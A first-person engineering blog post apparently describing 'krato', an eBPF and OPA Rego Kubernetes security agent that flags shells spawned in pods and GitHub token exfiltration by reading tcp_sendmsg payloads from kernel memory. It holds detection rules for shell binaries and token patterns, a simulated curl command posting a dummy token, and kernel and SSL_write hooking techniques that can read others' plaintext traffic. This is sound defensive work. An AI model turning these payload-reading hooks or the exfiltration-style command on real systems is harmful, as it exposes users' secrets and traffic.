I Built an eBPF Security Agent That Catches GitHub PAT Exfiltration at the Kernel Level

From zero eBPF experience to reading raw HTTP payloads out of kernel memory

I wanted to understand how runtime security tools like Falco and Tetragon actually work — not just use them, but build something from scratch that does what they do.

So I built krato — an eBPF-powered Kubernetes security agent that detects malicious processes and GitHub PAT exfiltration at the kernel level, with detection rules written in OPA Rego.

Here's everything I learned.

What even is eBPF?

Your Linux machine has two zones:

User space — everything you interact with. Your browser, terminal, apps.

Kernel space — the OS core. Every time an app wants to do anything — open a file, spawn a process, send network data — it asks the kernel via a syscall.

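eBPF lets you load a tiny sandboxed program into the Linux kernel, checked by the in-kernel verifier before it is allowed to run, that fires every time a specific event happens. Every process spawn. Every network packet. Overhead is typically low, because the program runs in kernel context without a round trip to user space.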

For security, this changes everything. Traditional tools match signatures, meaning known bad patterns. If the attack is new, no signature exists and it gets through.

eBPF watches behavior. It doesn't need to know what the attack is. It watches what every process does at the kernel level. A container that spawns a bash shell and makes an outbound network call — suspicious regardless of whether a CVE exists.

The architecture

Two parallel detection pipelines, one rule engine:

┌─────────────────────────────────────────────┐
│               Linux Kernel                  │
│                                             │
│   execve()              tcp_sendmsg()       │
│   (process spawn)       (outbound TCP)      │
└──────┬─────────────────────────┬────────────┘
       │                         │
       ▼                         ▼
  ┌─────────┐            ┌──────────────┐
  │Tetragon │            │  dpi.c       │
  │(eBPF)   │            │  (custom     │
  │         │            │   eBPF C)    │
  └────┬────┘            └──────┬───────┘
       │                        │
       └──────────┬─────────────┘
                  ▼
           ┌────────────┐
           │  Go Agent  │
           └─────┬──────┘
                 │
                 ▼
         ┌──────────────┐    ┌─────────────────┐
         │  OPA Engine  │◄───│  Rego Policies  │
         └──────┬───────┘    │  process.rego   │
                │            │  network.rego   │
                ▼            └─────────────────┘
           🚨 Alert

Three components:

Tetragon — Cilium's eBPF tool for process event detection, streams structured events over gRPC
dpi.c — custom eBPF C program I wrote that hooks tcp_sendmsg and reads raw payload bytes
OPA + Rego — rule engine so detection logic lives in text files, not compiled code

Setting up the cluster

I used Kind (Kubernetes in Docker) to spin up a local cluster:

kind create cluster --name ebpf-agent
helm repo add cilium https://helm.cilium.io
helm install tetragon cilium/tetragon -n kube-system

Key insight — Kind containers share your host machine's Linux kernel. There is no separate cluster kernel. This is why eBPF programs loaded inside Kind see processes on your actual laptop. Containers are not VMs.

I verified Tetragon was working by tailing its export log:

kubectl logs -n kube-system <tetragon-pod> -c export-stdout | head -20

Immediately fascinating — I could see my own Hyprland keyboard layout scripts firing every few seconds, with full process trees, arguments, UIDs, and nanosecond timestamps. The kernel sees everything.

Part 1 — Malicious Process Detection

The OPA engine

Instead of hardcoding detection logic in Go, I put all rules in .rego files. The Go agent just asks OPA: "does this event violate any rules?"

Add a new detection rule → drop a .rego file. No code changes, no rebuild.

My first Rego rule:

package agent.process

deny contains msg if {
    input.type == "process_exec"
    input.container.pod_name != ""        # only care about pods, not host processes
    shell_binary(input.process.binary)
    msg := sprintf(
        "Shell spawned in pod [%s/%s] — binary: %s",
        [input.container.namespace, input.container.pod_name, input.process.binary]
    )
}

shell_binary(b) if b == "/bin/bash"
shell_binary(b) if b == "/bin/sh"
shell_binary(b) if b == "/usr/bin/bash"
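
The rule only reads a handful of fields from input, so it helps to see the shape of the document the agent has to hand to OPA. A minimal Go sketch, assuming hypothetical struct names (Event, Container, Process) that simply mirror the field paths used in the rule; they are not taken from the krato source:

```go
package main

import (
	"encoding/json"
	"fmt"
)

// Container, Process, and Event are hypothetical names. Only the JSON
// field names come from the Rego rule (input.container.pod_name, etc.).
type Container struct {
	Namespace string `json:"namespace"`
	PodName   string `json:"pod_name"`
}

type Process struct {
	Binary string `json:"binary"`
}

type Event struct {
	Type      string    `json:"type"`
	Container Container `json:"container"`
	Process   Process   `json:"process"`
}

// toInput serializes an event into the JSON document passed to OPA as input.
func toInput(e Event) (string, error) {
	b, err := json.Marshal(e)
	if err != nil {
		return "", err
	}
	return string(b), nil
}

func main() {
	in, err := toInput(Event{
		Type:      "process_exec",
		Container: Container{Namespace: "default", PodName: "test-nginx"},
		Process:   Process{Binary: "/bin/bash"},
	})
	if err != nil {
		panic(err)
	}
	fmt.Println(in)
}
```

An event with an empty pod_name (a host process) would fail the second condition of the rule, so it never reaches the shell_binary check.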

Wiring Tetragon gRPC

Tetragon exposes a FineGuidanceSensors gRPC service. The Go agent opens a persistent stream:

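client := tetragonAPI.NewFineGuidanceSensorsClient(conn)
stream, err := client.GetEvents(ctx, &tetragonAPI.GetEventsRequest{})
if err != nil {
    log.Fatalf("open event stream: %v", err)
}

for {
    event, err := stream.Recv()
    if err != nil {
        log.Printf("event stream closed: %v", err)
        break
    }
    // parse event → OPA → alert
}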

One gotcha — Tetragon's Helm chart defaults to a Unix socket, not TCP. Fix:

helm upgrade tetragon cilium/tetragon -n kube-system \
  --set tetragon.grpc.address="localhost:54321"

The test

kubectl run test-nginx --image=nginx --restart=Never
kubectl exec -it test-nginx -- /bin/bash

The moment I hit enter:

🚨 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   ALERT — process_exec
🚨 ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
   → Shell spawned in pod [default/test-nginx] — binary: /bin/bash
   binary:  /bin/bash
   parent:  /usr/local/bin/containerd-shim-runc-v2
   uid:     0
   pod:     default/test-nginx

   raw event:
   {
     "container": { "name": "test-nginx", "namespace": "default", "pod_name": "test-nginx" },
     "process": { "binary": "/bin/bash", "uid": 0, "pid": 396155 },
     "type": "process_exec"
   }
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

Real kernel event. Real alert. End to end.

(Screenshot: agent terminal showing red alert for shell-in-nginx)

Part 2 — Deep Packet Inspection for GitHub PAT Exfiltration

This is where it got genuinely hard.

Why Tetragon wasn't enough

Tetragon tells you a process made a network connection. It doesn't show you the payload — the actual bytes sent. To detect a GitHub PAT (ghp_*) inside an outbound HTTP request, I needed to read the raw data.

Solution: write my own eBPF program in C.

How tcp_sendmsg works

Every time any process sends TCP data, the kernel calls:

int tcp_sendmsg(struct sock *sk, struct msghdr *msg, size_t size);

The msghdr contains a msg_iter — an iterator over the bytes being sent. By hooking this function with a kprobe and reading that iterator, I can see the payload before it leaves the machine.

Writing the eBPF C program — what I learned

1. Generate vmlinux.h from your kernel's BTF data

bpftool btf dump file /sys/kernel/btf/vmlinux format c > ebpf/vmlinux.h

This gives you all kernel struct definitions for your exact kernel. 159,000 lines. You need this instead of individual kernel headers.

2. Kernel 6.18 uses ITER_UBUF — this was the critical bug

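The msg_iter has an iter_type field. My code assumed every iterator was ITER_IOVEC (type 1 on this kernel). ITER_UBUF, a simpler single-buffer iterator, was added in Linux 6.0, and on my 6.18 kernel curl and most send() calls arrive as ITER_UBUF (type 0). The numeric values have moved between kernel releases, so compare against the enum names from vmlinux.h rather than hardcoded numbers.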

My original code only handled ITER_IOVEC. Nothing was being read. Fixed by branching on iter_type:

iter_type = BPF_CORE_READ(msg, msg_iter.iter_type);

if (iter_type == ITER_IOVEC) {
    iov_ptr = BPF_CORE_READ(msg, msg_iter.__iov);
    // read from iov_ptr->iov_base + iov_offset
} else if (iter_type == ITER_UBUF) {
    ubuf = BPF_CORE_READ(msg, msg_iter.ubuf);
    // read directly from ubuf + iov_offset
}
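
To make the failure mode concrete, here is a user-space model of that branch in Go. It is only a sketch: MsgIter is a hypothetical, heavily simplified stand-in for struct iov_iter, and the numeric constants follow the values I saw on my kernel. It shows why a reader that only handles ITER_IOVEC returns nothing for a single-buffer send.

```go
package main

import "fmt"

// IterType mirrors the two iterator kinds discussed above. The values
// (UBUF = 0, IOVEC = 1) match the article's kernel and are not stable
// across kernel versions.
type IterType int

const (
	IterUbuf  IterType = 0
	IterIovec IterType = 1
)

// MsgIter is a simplified, hypothetical stand-in for struct iov_iter.
type MsgIter struct {
	Type      IterType
	IovOffset int
	Ubuf      []byte   // single buffer, used when Type == IterUbuf
	Iov       [][]byte // segment list, used when Type == IterIovec
}

// firstChunk returns the bytes a probe would read first, or nil when the
// iterator kind is not handled or the offset is out of range.
func firstChunk(it MsgIter) []byte {
	switch it.Type {
	case IterIovec:
		if len(it.Iov) == 0 || it.IovOffset > len(it.Iov[0]) {
			return nil
		}
		return it.Iov[0][it.IovOffset:]
	case IterUbuf:
		if it.IovOffset > len(it.Ubuf) {
			return nil
		}
		return it.Ubuf[it.IovOffset:]
	default:
		return nil
	}
}

func main() {
	ubuf := MsgIter{Type: IterUbuf, Ubuf: []byte("POST / HTTP/1.1")}
	iovec := MsgIter{Type: IterIovec, Iov: [][]byte{[]byte("POST / HTTP/1.1")}}
	fmt.Printf("%q\n", firstChunk(ubuf))
	fmt.Printf("%q\n", firstChunk(iovec))
}
```

Deleting the IterUbuf case reproduces my original bug: the function quietly returns nil for every curl request.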

3. The & 511 mask bug

When reading payload bytes:

// DANGEROUS
bpf_probe_read_user(event->payload, event->payload_len & (MAX_PAYLOAD_SIZE - 1), src);

When payload_len == 512 and MAX_PAYLOAD_SIZE == 512: 512 & 511 = 0. Reading zero bytes. Fixed:

__u32 read_len = count > MAX_PAYLOAD_SIZE ? MAX_PAYLOAD_SIZE : (__u32)count;
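
The arithmetic is easy to check outside the kernel. A small Go sketch comparing the two length computations, with maskLen and clampLen as hypothetical helper names:

```go
package main

import "fmt"

const maxPayloadSize = 512 // same value as MAX_PAYLOAD_SIZE in the text

// maskLen reproduces the buggy computation: a bitmask wraps around.
func maskLen(n uint32) uint32 { return n & (maxPayloadSize - 1) }

// clampLen reproduces the fix: cap the length at the buffer size.
func clampLen(n uint32) uint32 {
	if n > maxPayloadSize {
		return maxPayloadSize
	}
	return n
}

func main() {
	for _, n := range []uint32{100, 511, 512, 700} {
		fmt.Printf("len=%d mask=%d clamp=%d\n", n, maskLen(n), clampLen(n))
	}
}
```

The mask only agrees with the clamp for lengths below the buffer size. At exactly 512 it yields 0, and at 700 it yields 188, so longer payloads are silently cut to an arbitrary prefix.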

4. Use BPF_CORE_READ everywhere

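Direct struct field access bakes in the field offsets of the kernel you compiled against, so it can break on other kernel versions. BPF_CORE_READ records CO-RE relocations that the loader resolves against the running kernel's BTF: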

count = BPF_CORE_READ(msg, msg_iter.count);
iov_offset = BPF_CORE_READ(msg, msg_iter.iov_offset);

5. Try user memory first, fall back to kernel

static __always_inline long read_memory(void *dst, __u32 len, const void *src) {
    long ret = bpf_probe_read_user(dst, len, src);
    if (ret < 0)
        ret = bpf_probe_read_kernel(dst, len, src);
    return ret;
}

Compiling and loading

clang -O2 -g -target bpf \
    -D__TARGET_ARCH_x86 \
    -I ebpf/ \
    -c ebpf/dpi.c \
    -o internal/dpi/dpi_bpf.o

The Go agent loads this at runtime using cilium/ebpf:

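// Error handling elided for brevity; check every err in real code.
spec, _ := ebpf.LoadCollectionSpec("internal/dpi/dpi_bpf.o")
coll, _ := ebpf.NewCollection(spec)
defer coll.Close()
kp, _ := link.Kprobe("tcp_sendmsg", coll.Programs["kprobe_tcp_sendmsg"], nil)
defer kp.Close()
rd, _ := ringbuf.NewReader(coll.Maps["events"])
defer rd.Close()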
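
On the consuming side, each record read from the ring buffer is a raw byte slice that has to be decoded into fields. A minimal sketch using only the standard library, assuming a hypothetical event layout (pid, payload_len, a 16-byte comm, a 512-byte payload) and a little-endian host; the real struct in dpi.c may differ:

```go
package main

import (
	"bytes"
	"encoding/binary"
	"fmt"
)

const maxPayloadSize = 512

// rawEvent is a hypothetical layout for the struct the eBPF program
// submits. Field order and sizes must match the C side exactly.
type rawEvent struct {
	PID        uint32
	PayloadLen uint32
	Comm       [16]byte
	Payload    [maxPayloadSize]byte
}

// decodeEvent parses one ring buffer sample into pid, process name, and payload.
func decodeEvent(sample []byte) (uint32, string, []byte, error) {
	var ev rawEvent
	if err := binary.Read(bytes.NewReader(sample), binary.LittleEndian, &ev); err != nil {
		return 0, "", nil, err
	}
	n := ev.PayloadLen
	if n > maxPayloadSize {
		n = maxPayloadSize // never trust a length field beyond the buffer
	}
	comm := ev.Comm[:]
	if i := bytes.IndexByte(comm, 0); i >= 0 {
		comm = comm[:i] // comm is NUL-terminated
	}
	return ev.PID, string(comm), ev.Payload[:n], nil
}

// encodeEvent builds a sample with the same layout, for testing the decoder.
func encodeEvent(pid uint32, comm string, payload []byte) []byte {
	var ev rawEvent
	ev.PID = pid
	copy(ev.Comm[:len(ev.Comm)-1], comm) // keep a trailing NUL
	ev.PayloadLen = uint32(copy(ev.Payload[:], payload))
	var buf bytes.Buffer
	// Writing a fixed-size struct to a bytes.Buffer cannot fail.
	_ = binary.Write(&buf, binary.LittleEndian, &ev)
	return buf.Bytes()
}

func main() {
	sample := encodeEvent(397417, "curl", []byte("POST / HTTP/1.1"))
	pid, comm, payload, err := decodeEvent(sample)
	if err != nil {
		panic(err)
	}
	fmt.Println(pid, comm, string(payload))
}
```

With cilium/ebpf, the bytes passed to decodeEvent would come from the RawSample field of the record returned by rd.Read().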

The moment it worked

Inside the nginx container:

curl -X POST http://10.244.0.7:8080 \
  -d 'token=ghp_1234567890abcdefghijklmnopqrstuvwxyz'

Agent terminal:

━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
PID:     397417
Process: curl
Payload: POST / HTTP/1.1
Host: 10.244.0.7:8080
User-Agent: curl/8.14.1
Content-Type: application/x-www-form-urlencoded

token=ghp_1234567890abcdefghijklmnopqrstuvwxyz
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━

My eBPF program read the raw HTTP payload from kernel memory and surfaced the PAT before the data left the machine.

Something interesting — the same PAT appeared at multiple layers:

🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED
PID:     2079
Process: containerd          ← caught at container runtime level

🔑 CRITICAL — GitHub PAT EXFILTRATION DETECTED  
PID:     397417
Process: curl                ← caught in the actual HTTP payload

That's kernel-level visibility. The same secret surfaced at every layer of the stack.

(Screenshot: terminal showing both alerts firing)

Why OPA Rego makes this production-ready

Detection logic lives entirely in .rego files — not Go code.

Adding a new detection rule:

deny contains msg if {
    input.type == "network_connect"
    input.container.pod_name != ""
    regex.match(`ghp_[A-Za-z0-9]{36}`, input.network.payload)
    msg := sprintf("GitHub PAT detected → %s", [input.network.dest_ip])
}

Drop the file. Agent picks it up on restart. Security teams write and audit rules without touching Go. Rules are version-controlled and diffable like any other code.
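
The pattern in that rule can be sanity-checked from Go before it goes anywhere near the agent. A small sketch using the standard regexp package, with findPAT as a hypothetical helper name; Go's regexp and OPA's regex.match both use RE2-style syntax, so I would expect the same expression to behave the same way in both:

```go
package main

import (
	"fmt"
	"regexp"
)

// patPattern is the same expression used in the Rego rule above.
var patPattern = regexp.MustCompile(`ghp_[A-Za-z0-9]{36}`)

// findPAT returns the first token-shaped match in payload, if any.
func findPAT(payload string) (string, bool) {
	m := patPattern.FindString(payload)
	return m, m != ""
}

func main() {
	payloads := []string{
		"token=ghp_1234567890abcdefghijklmnopqrstuvwxyz",
		"token=ghp_tooshort",
	}
	for _, p := range payloads {
		_, ok := findPAT(p)
		fmt.Printf("%-50s match=%v\n", p, ok)
	}
}
```

The test token from the curl command has exactly 36 characters after the ghp_ prefix, which is why it matches while the shortened one does not.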

Same pattern production tools use — Falco's rules language, Tetragon's TracingPolicy CRDs. Separate detection logic from detection infrastructure.

What I'd build next

SSL uprobe for HTTPS traffic

The current DPI only catches unencrypted HTTP. For HTTPS, data is encrypted before tcp_sendmsg sees it.

Fix: attach a uprobe to SSL_write in libssl.so. This function is called with plaintext data before encryption, so hooking it lets you read the payload before TLS encrypts it. Pixie uses this approach to trace TLS traffic in production.

uprobes:
  - path: "/usr/lib/x86_64-linux-gnu/libssl.so.3"
    symbol: "SSL_write"
    args:
      - index: 1
        type: "char_buf"
        sizeArgIndex: 2

Threat intel feed integration

Pull known bad IPs from OTX or MISP into OPA as external data. Rules check destination IPs against a live feed — zero Go changes needed.
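
One way this could look, as a rough sketch only: normalize a feed into a JSON document that OPA can load as external data. The feed format (one IP per line, "#" comments) and the bad_ips key are assumptions for illustration; real OTX or MISP exports are structured differently and would need their own parser.

```go
package main

import (
	"bufio"
	"encoding/json"
	"fmt"
	"net/netip"
	"strings"
)

// parseFeed reads one IP per line, skipping blanks, "#" comments, and
// anything that does not parse as an IP address.
func parseFeed(feed string) []string {
	var ips []string
	sc := bufio.NewScanner(strings.NewReader(feed))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		if line == "" || strings.HasPrefix(line, "#") {
			continue
		}
		addr, err := netip.ParseAddr(line)
		if err != nil {
			continue
		}
		ips = append(ips, addr.String())
	}
	return ips
}

// toOPAData wraps the IPs in a JSON object keyed by address, so a rule
// can do a constant-time lookup. "bad_ips" is a hypothetical key name.
func toOPAData(ips []string) (string, error) {
	set := make(map[string]bool, len(ips))
	for _, ip := range ips {
		set[ip] = true
	}
	b, err := json.Marshal(map[string]any{"bad_ips": set})
	if err != nil {
		return "", err
	}
	return string(b), nil
}

func main() {
	feed := "# sample feed\n203.0.113.7\n\nnot-an-ip\n198.51.100.2\n"
	doc, err := toOPAData(parseFeed(feed))
	if err != nil {
		panic(err)
	}
	fmt.Println(doc)
}
```

A rule could then test something like data.bad_ips[input.network.dest_ip], where the exact data path depends on how the document is loaded into OPA.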

Policy hot-reload

Use inotify to watch the policies directory. .rego file changes → reload OPA engine in place. Zero downtime rule updates.
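
The change-detection half of this is simple enough to sketch with the standard library. Note that this version polls modification times instead of using inotify, which keeps the example dependency-free; the policies directory name and both helper names are hypothetical.

```go
package main

import (
	"fmt"
	"os"
	"path/filepath"
	"sort"
)

// snapshot maps each .rego file in dir to its modification time in nanoseconds.
func snapshot(dir string) (map[string]int64, error) {
	paths, err := filepath.Glob(filepath.Join(dir, "*.rego"))
	if err != nil {
		return nil, err
	}
	snap := make(map[string]int64, len(paths))
	for _, p := range paths {
		info, err := os.Stat(p)
		if err != nil {
			continue // file vanished between Glob and Stat
		}
		snap[p] = info.ModTime().UnixNano()
	}
	return snap, nil
}

// changed lists files that were added, removed, or modified between two
// snapshots, sorted for stable output.
func changed(prev, cur map[string]int64) []string {
	var out []string
	for p, t := range cur {
		if old, ok := prev[p]; !ok || old != t {
			out = append(out, p)
		}
	}
	for p := range prev {
		if _, ok := cur[p]; !ok {
			out = append(out, p)
		}
	}
	sort.Strings(out)
	return out
}

func main() {
	prev, err := snapshot("policies")
	if err != nil {
		panic(err)
	}
	cur, err := snapshot("policies")
	if err != nil {
		panic(err)
	}
	// In the agent this comparison would run on a timer, and a non-empty
	// result would trigger a reload of the OPA engine.
	fmt.Println("changed files:", changed(prev, cur))
}
```

Swapping the polling loop for inotify later would only replace snapshot; the reload trigger stays the same.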

Key takeaways

Runtime security is fundamentally about being as close to the kernel as possible. Signatures and logs are too slow, too far from the action. eBPF puts detection where events actually happen — at syscall time, before data leaves the machine.

The specific lessons:

Newer kernels (6.18 on my machine) hand single-buffer sends to tcp_sendmsg as ITER_UBUF, so always branch on iter_type
Use BPF_CORE_READ for CO-RE compatibility across kernel versions
The & (MAX_PAYLOAD_SIZE - 1) mask wraps instead of clamping: a payload exactly the size of the buffer reads zero bytes
bpf_probe_read_user with kernel fallback covers most memory access patterns
Kind shares the host kernel — eBPF programs see everything, not just cluster processes

The repo

Full project open source at github.com/karandesai2005/krato

Includes: eBPF C program with full ITER_UBUF/ITER_IOVEC handling, OPA Rego rules for process detection and DPI, Tetragon gRPC listener, Kind cluster setup scripts, architecture diagram.

Karan Desai — security engineer, final year CS at SIT Pune. Metasploit Framework contributor. IEEE SA Cybersecurity Hackathon 2026 — 1st place, 190 teams, 34 countries. Active bug bounty researcher on Bugcrowd.

GitHub: github.com/karandesai2005 | Portfolio: karan-desai.vercel.app